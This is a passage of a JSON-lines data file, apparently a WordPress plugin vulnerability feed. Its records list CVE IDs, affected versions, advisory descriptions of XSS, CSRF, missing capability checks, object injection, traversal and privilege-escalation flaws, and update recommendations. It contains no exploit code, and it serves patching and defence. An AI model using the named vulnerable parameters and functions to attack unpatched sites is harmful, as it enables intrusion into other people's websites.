version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.2.0\\\/modules\\\/widgets\\\/tp_countdown.php#L1868\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.2.0\\\/modules\\\/widgets\\\/tp_countdown.php#L1868\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.2.0\\\/modules\\\/widgets\\\/tp_page_scroll.php#L1015\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.2.0\\\/modules\\\/widgets\\\/tp_page_scroll.php#L1015\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.2.0\\\/modules\\\/widgets\\\/tp_syntax_highlighter.php#L1043\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.2.0\\\/modules\\\/widgets\\\/tp_syntax_highlighter.php#L1043\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3252092\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3252092\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbf86da7-621d-4fb7-ba16-d132db5b602a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbf86da7-621d-4fb7-ba16-d132db5b602a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10606","slug":"wp-travel-engine","versionImpact":"6.2.1","versionEndExcluding":"6.2.2","description":"The WP Travel Engine \u2013 Tour Booking Plugin \u2013 Tour Operator Software plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wpte_onboard_save_function_callback() function in all versions up to, and including, 6.2.1. This makes it possible for authenticated attackers, with contributor-level access and above, to modify several settings that could have an impact such as lost revenue and page updates.","recommendation":"Update to version 6.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3193913\\\/wp-travel-engine\\\/tags\\\/6.2.2\\\/includes\\\/class-wp-travel-engine-onboard.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3193913\\\/wp-travel-engine\\\/tags\\\/6.2.2\\\/includes\\\/class-wp-travel-engine-onboard.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c91d1ec0-0430-4ddd-b6b1-25af0b5cea9d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c91d1ec0-0430-4ddd-b6b1-25af0b5cea9d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-0775","slug":"woocommerce","versionImpact":"6.2.0","versionEndExcluding":"6.2.1","description":"The WooCommerce WordPress plugin before 6.2.1 does not have a proper authorisation check when deleting reviews, which could allow any authenticated user, such as a subscriber, to delete arbitrary comments.","recommendation":"Update to version 6.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b76dbf37-a0a2-48cf-bd85-3ebbc2f394dd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b76dbf37-a0a2-48cf-bd85-3ebbc2f394dd\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2683324\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2683324\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/developer.woocommerce.com\\\/2022\\\/02\\\/22\\\/woocommerce-6-2-1-security-fix\\\/\",\"name\":\"https:\\\/\\\/developer.woocommerce.com\\\/2022\\\/02\\\/22\\\/woocommerce-6-2-1-security-fix\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12099","slug":"dollie","versionImpact":"6.2.0","versionEndExcluding":"6.2.1","description":"The Dollie Hub \u2013 Build Your Own WordPress Cloud Platform plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 6.2.0 via the 'elementor-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to.","recommendation":"Update to version 6.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201770%40dollie&new=3201770%40dollie&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201770%40dollie&new=3201770%40dollie&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f29514d0-20a5-43f2-bf36-660579103220?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f29514d0-20a5-43f2-bf36-660579103220?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11281","slug":"woo-point-of-sale","versionImpact":"6.1.0","versionEndExcluding":"6.2.0","description":"The WooCommerce Point of Sale plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 6.1.0. This is due to insufficient validation on the 'logged_in_user_id' value when option values are empty and the ability for attackers to change the email of arbitrary user accounts. This makes it possible for unauthenticated attackers to change the email of arbitrary user accounts, including administrators, and reset their password to gain access to the account.","recommendation":"Update to version 6.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wordpress-woocommerce-pos-system-point-of-sale\\\/21254976\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wordpress-woocommerce-pos-system-point-of-sale\\\/21254976\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a0671b1-1414-4315-8a2d-bd1aabe091a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a0671b1-1414-4315-8a2d-bd1aabe091a4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11829","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"6.1.8","versionEndExcluding":"6.2.0","description":"The The Plus Addons for Elementor \u2013 Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Table Widget's searchable_label parameter in all versions up to, and including, 6.1.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207945\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.1.2\\\/modules\\\/widgets\\\/tp_table.php?old=3207456&old_path=the-plus-addons-for-elementor-page-builder%2Ftags%2F6.1.1%2Fmodules%2Fwidgets%2Ftp_table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207945\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.1.2\\\/modules\\\/widgets\\\/tp_table.php?old=3207456&old_path=the-plus-addons-for-elementor-page-builder%2Ftags%2F6.1.1%2Fmodules%2Fwidgets%2Ftp_table.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3218225\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.1.4\\\/modules\\\/widgets\\\/tp_table.php?old=3212455&old_path=the-plus-addons-for-elementor-page-builder%2Ftags%2F6.1.3%2Fmodules%2Fwidgets%2Ftp_table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3218225\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.1.4\\\/modules\\\/widgets\\\/tp_table.php?old=3212455&old_path=the-plus-addons-for-elementor-page-builder%2Ftags%2F6.1.3%2Fmodules%2Fwidgets%2Ftp_table.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.1.8&new_path=\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.2.0&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.1.8&new_path=\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.2.0&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/edf62f82-448a-4ed8-8d4b-7215223494cb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/edf62f82-448a-4ed8-8d4b-7215223494cb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1405","slug":"formidable","versionImpact":"6.1.2","versionEndExcluding":"6.2","description":"The Formidable Forms WordPress plugin before 6.2 unserializes user input, which could allow anonymous users to perform PHP Object Injection when a suitable gadget is present.","recommendation":"Update to version 6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8c727a31-ff65-4472-8191-b1becc08192a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8c727a31-ff65-4472-8191-b1becc08192a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-50874","slug":"ajax-load-more","versionEndExcluding":"6.2","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Darren Cooney WordPress Infinite Scroll \u2013 Ajax Load More allows Stored XSS. This issue affects WordPress Infinite Scroll \u2013 Ajax Load More: from n\/a through 6.1.0.1.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ajax-load-more\\\/wordpress-ajax-load-more-plugin-6-1-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ajax-load-more\\\/wordpress-ajax-load-more-plugin-6-1-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3949","slug":"coming-soon","versionImpact":"6.18.15","versionEndExcluding":"6.18.16","description":"The Website Builder by SeedProd \u2014 Theme Builder, Landing Page Builder, Coming Soon Page, Maintenance Mode plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'seedprod_lite_get_revisisons' function in all versions up to, and including, 6.18.15. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the content of arbitrary landing page revisions.","recommendation":"Update to version 6.18.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/coming-soon\\\/tags\\\/6.18.15\\\/app\\\/lpage.php#L820\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/coming-soon\\\/tags\\\/6.18.15\\\/app\\\/lpage.php#L820\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288645\\\/coming-soon\\\/trunk\\\/app\\\/lpage.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288645\\\/coming-soon\\\/trunk\\\/app\\\/lpage.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.seedprod.com\\\/docs\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/www.seedprod.com\\\/docs\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/669b0f30-8958-420c-93c5-0103b71967dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/669b0f30-8958-420c-93c5-0103b71967dd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11188","slug":"formidable","versionImpact":"6.16.1.2","versionEndExcluding":"6.16.2","description":"The Formidable Forms \u2013 Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder plugin for WordPress is vulnerable to POST-Based Reflected Cross-Site Scripting via the Custom HTML Form parameters in all versions up to, and including, 6.16.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 6.16.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formidable\\\/tags\\\/6.16\\\/classes\\\/helpers\\\/FrmFieldsHelper.php#L158\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formidable\\\/tags\\\/6.16\\\/classes\\\/helpers\\\/FrmFieldsHelper.php#L158\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da84aa80-7ef6-4846-870d-07bf88652329?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da84aa80-7ef6-4846-870d-07bf88652329?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1072","slug":"coming-soon","versionImpact":"6.15.21","versionEndExcluding":"6.15.22","description":"The Website Builder by SeedProd \u2014 Theme Builder, Landing Page Builder, Coming Soon Page, Maintenance Mode plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the seedprod_lite_new_lpage function in all versions up to, and including, 6.15.21. This makes it possible for unauthenticated attackers to change the contents of coming-soon, maintenance pages, login and 404 pages set up with the plugin. Version 6.15.22 addresses this issue but introduces a bug affecting admin pages. We suggest upgrading to 6.15.23.","recommendation":"Update to version 6.15.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78d7920b-3e20-43c7-a522-72bac824c2cb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78d7920b-3e20-43c7-a522-72bac824c2cb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3029567\\\/coming-soon\\\/trunk\\\/app\\\/lpage.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3029567\\\/coming-soon\\\/trunk\\\/app\\\/lpage.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4975","slug":"coming-soon","versionImpact":"6.15.13.1","versionEndExcluding":"6.15.15.3","description":"The Website Builder by SeedProd plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 6.15.13.1. This is due to missing or incorrect nonce validation on functionality in the builder.php file. This makes it possible for unauthenticated attackers to change the stripe connect token via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 6.15.15.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2cb5370f-14aa-445d-bda3-62a0dd068fc5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2cb5370f-14aa-445d-bda3-62a0dd068fc5?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/coming-soon\\\/trunk\\\/resources\\\/views\\\/builder.php#L164\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/coming-soon\\\/trunk\\\/resources\\\/views\\\/builder.php#L164\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2968455\\\/coming-soon\\\/trunk\\\/resources\\\/views\\\/builder.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2968455\\\/coming-soon\\\/trunk\\\/resources\\\/views\\\/builder.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9768","slug":"formidable","versionImpact":"6.14","versionEndExcluding":"6.14.1","description":"The Formidable Forms WordPress plugin before 6.14.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 6.14.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c4ff11b-4a06-433d-8f0e-4069865721c0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c4ff11b-4a06-433d-8f0e-4069865721c0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5144","slug":"the-events-calendar","versionImpact":"6.13.2","versionEndExcluding":"6.13.2.1","description":"The The Events Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018data-date-*\u2019 parameters in all versions up to, and including, 6.13.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.13.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/bootstrap-datepicker.readthedocs.io\\\/en\\\/latest\\\/index.html#data-api\",\"name\":\"https:\\\/\\\/bootstrap-datepicker.readthedocs.io\\\/en\\\/latest\\\/index.html#data-api\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/uxsolutions\\\/bootstrap-datepicker\\\/blob\\\/master\\\/js\\\/bootstrap-datepicker.js#L131\",\"name\":\"https:\\\/\\\/github.com\\\/uxsolutions\\\/bootstrap-datepicker\\\/blob\\\/master\\\/js\\\/bootstrap-datepicker.js#L131\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-events-calendar\\\/tags\\\/6.12.0.1\\\/vendor\\\/bootstrap-datepicker\\\/js\\\/bootstrap-datepicker.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-events-calendar\\\/tags\\\/6.12.0.1\\\/vendor\\\/bootstrap-datepicker\\\/js\\\/bootstrap-datepicker.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-events-calendar\\\/tags\\\/6.13.0\\\/vendor\\\/bootstrap-datepicker\\\/js\\\/bootstrap-datepicker.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-events-calendar\\\/tags\\\/6.13.0\\\/vendor\\\/bootstrap-datepicker\\\/js\\\/bootstrap-datepicker.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3307301\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3307301\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56822fe5-352c-4269-9fab-d8c796362b74?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56822fe5-352c-4269-9fab-d8c796362b74?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13795","slug":"ecwid-shopping-cart","versionImpact":"6.12.27","versionEndExcluding":"6.12.28","description":"The Ecwid by Lightspeed Ecommerce Shopping Cart plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.12.27. This is due to missing or incorrect nonce validation on the ecwid_deactivate_feedback() function. This makes it possible for unauthenticated attackers to send deactivation messages on behalf of a site owner via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 6.12.28, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3241777%40ecwid-shopping-cart&new=3241777%40ecwid-shopping-cart&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3241777%40ecwid-shopping-cart&new=3241777%40ecwid-shopping-cart&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1eb9ec6-897a-4c38-a85c-033d7050dcfa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1eb9ec6-897a-4c38-a85c-033d7050dcfa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2293","slug":"site-reviews","versionImpact":"6.11.4","versionEndExcluding":"6.11.7","description":"The Site Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the user display name in all versions up to, and including, 6.11.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.11.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/823418d9-a231-4306-8575-2937a491509f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/823418d9-a231-4306-8575-2937a491509f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/site-reviews\\\/trunk\\\/views\\\/partials\\\/listtable\\\/filter.php#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/site-reviews\\\/trunk\\\/views\\\/partials\\\/listtable\\\/filter.php#L5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/site-reviews\\\/tags\\\/6.11.4&old=3049214&new_path=\\\/site-reviews\\\/tags\\\/6.11.7&new=3049214&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/site-reviews\\\/tags\\\/6.11.4&old=3049214&new_path=\\\/site-reviews\\\/tags\\\/6.11.7&new=3049214&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6725","slug":"formidable","versionImpact":"6.11.1","versionEndExcluding":"6.11.2","description":"The Formidable Forms \u2013 Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018html\u2019 parameter in all versions up to, and including, 6.11.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with form editing permissions and Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.11.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/848cfa72-4211-4576-91c2-4f643e3161c3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/848cfa72-4211-4576-91c2-4f643e3161c3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formidable\\\/trunk\\\/classes\\\/models\\\/fields\\\/FrmFieldType.php#L875\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formidable\\\/trunk\\\/classes\\\/models\\\/fields\\\/FrmFieldType.php#L875\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3128202\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3128202\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6699","slug":"wp-compress-image-optimizer","versionImpact":"6.10.33","versionEndExcluding":"6.10.34","description":"The WP Compress \u2013 Image Optimizer [All-In-One] plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 6.10.33 via the css parameter. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 6.10.34, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/defb87dd-bf5f-411f-b948-699337d05d44?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/defb87dd-bf5f-411f-b948-699337d05d44?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3009183%40wp-compress-image-optimizer%2Ftrunk&old=2994665%40wp-compress-image-optimizer%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3009183%40wp-compress-image-optimizer%2Ftrunk&old=2994665%40wp-compress-image-optimizer%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12409","slug":"simplepress","versionImpact":"6.10.11","versionEndExcluding":"6.10.12","description":"The Simple:Press Forum plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 's' parameter in all versions up to, and including, 6.10.11 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 6.10.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simplepress\\\/trunk\\\/admin\\\/panel-plugins\\\/forms\\\/spa-plugins-list-form.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simplepress\\\/trunk\\\/admin\\\/panel-plugins\\\/forms\\\/spa-plugins-list-form.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3230289%40simplepress&new=3230289%40simplepress&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3230289%40simplepress&new=3230289%40simplepress&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b9ebeb96-2f39-488e-aef6-d5af0a37c24a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b9ebeb96-2f39-488e-aef6-d5af0a37c24a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10483","slug":"simplepress","versionImpact":"6.10.10","versionEndExcluding":"6.10.11","description":"The Simple:Press Forum WordPress plugin before 6.10.11 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.","recommendation":"Update to version 6.10.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c7e3c473-09b2-473b-87d7-0a01d8f52086\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c7e3c473-09b2-473b-87d7-0a01d8f52086\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
